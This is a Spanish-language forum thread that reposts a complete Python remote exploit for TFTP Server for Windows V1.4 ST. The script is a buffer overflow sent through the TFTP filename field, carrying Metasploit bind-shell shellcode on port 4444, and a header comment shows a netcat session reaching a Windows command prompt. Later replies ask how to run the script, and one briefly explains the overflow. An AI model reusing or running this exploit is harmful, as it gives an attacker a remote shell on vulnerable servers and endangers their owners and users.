Página 1 de 1

TFTP Server for Windows V1.4 ST (0day) by Muts

Publicado: 05 May 2010, 00:28
por RAT777

Código: Seleccionar todo

#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/ ... tpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation.  All 
# rights reserved.
#
# C:\Windows\system32>
##################################################################

import socket
import sys

print "[*] TFTP Server for Windows V1.4 ST (0day)"
print "[*] http://www.offensive-security.com"

host = '172.16.167.134'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

# Jump back shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444

shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
"\xff\xd0")

filename = "\x90"*860 + shell + "\x90"*14 + sc + "\xeb\xd0\x90\x90" + "\x2b\x0e\x41"

mode = "netascii"

muha = "\x00\x02" + filename+ "\0" + mode+ "\0" 

print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"

# milw0rm.com [2008-03-26]
Fuente: [Enlace externo eliminado para invitados]

Re: TFTP Server for Windows V1.4 ST (0day) by Muts

Publicado: 01 Jul 2010, 09:19
por Skillmax
RAT, ¿Podrias explicar un poco la función de este exploit?, un saludo.

Re: TFTP Server for Windows V1.4 ST (0day) by Muts

Publicado: 12 Dic 2010, 17:38
por synth3tik
Necesito python para compilarlo?

Re: TFTP Server for Windows V1.4 ST (0day) by Muts

Publicado: 12 Dic 2010, 18:29
por synth3tik
Podrias postear el programa vulnerable para testearlo... no lo encuentro en la pagina esta una version actualizada

Re: TFTP Server for Windows V1.4 ST (0day) by Muts

Publicado: 30 Dic 2010, 22:15
por KHC
No necesitas compilarlo y obvio necesita python si trabajas en GNU basta con interpretarlo de la sigiente forma

Código: Seleccionar todo

sudo python nombre del archivo.py
Ahora no tiene mucha siencia mezcla python un poco de sockets y metasploit framework para obtener un shell_blind_tcp por el puerto 69 por lo qu eveo y esta interesante ola mezcla de metasploit con python lindo gracias por traerlo!

Re: TFTP Server for Windows V1.4 ST (0day) by Muts

Publicado: 31 Dic 2010, 01:09
por frd
juhscr escribió:No necesitas compilarlo y obvio necesita python si trabajas en GNU basta con interpretarlo de la sigiente forma

Código: Seleccionar todo

sudo python nombre del archivo.py
Ahora no tiene mucha siencia mezcla python un poco de sockets y metasploit framework para obtener un shell_blind_tcp por el puerto 69 por lo qu eveo y esta interesante ola mezcla de metasploit con python lindo gracias por traerlo!
dices que no tiene mucha siencia pero si tiene mucha ciencia enviar un exploit por sockets interpretando el header y el "nombre del archivo" que se traduce a un buffer overflow por enviar un string mayor de 1240 bytes como el nombre del archivo, donde crearas codigo basura shellcode mas codigo basura el salto a la shellcode y el cambio del eip y el return

deberias estar trabajando para offesive security